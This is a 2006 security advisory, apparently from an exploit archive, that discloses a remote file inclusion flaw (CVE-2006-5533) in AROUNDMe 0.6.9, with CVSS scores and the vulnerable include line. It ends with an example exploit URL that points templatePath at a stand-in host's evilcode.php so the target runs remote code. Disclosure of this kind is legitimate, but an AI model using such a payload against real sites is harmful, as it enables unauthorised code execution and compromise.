AROUNDMe 0.6.9 remonte file inclusion

2006.10.30

Credit: noislet

Risk: High

Local: No

Remote: Yes

CVE: CVE-2006-5533

CWE: CWE-Other

CVSS Base Score: 5.1/10

Impact Subscore: 6.4/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

==============================================
 AROUNDMe 0.6.9 remonte file inclusion
 vendor site: http://barnraiser.org/
 vulnerable versions: 0.6.9 (and possibly older)

discovered by: noislet  ( http://www.noislet.org/ )

vendor informed: 21.10.2006
 published: 22.10.2006
 ==============================================

product info:
 AROUNDMe is the perfect solution for you to bring people together
around shared goals, activities and interests to form a shared
knowledge network.

==============================================

bug details:
 Input passed to the "$templatePath" is not verified before being used
to include files.

required:
 register_globals = On

file:
 pol_view.tpl.php (and others)

buggy code:
 if (isset($poll)) {
 ...
 include $templatePath . "poll_detail.inc.tpl.php";

==============================================

example exploitation:
 http://random.site/aroundme/template/barnraiser_01/pol_view.tpl.php?poll
=1&templatePath=http://example.com/evilcode.php%00

--
 noislet
     page http://www.noislet.org/

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

AROUNDMe 0.6.9 remonte file inclusion

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

AROUNDMe 0.6.9 remonte file inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.